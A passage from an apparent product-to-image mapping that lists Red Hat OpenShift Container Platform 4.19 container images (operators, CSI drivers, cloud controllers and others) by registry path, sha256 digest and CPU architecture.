"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
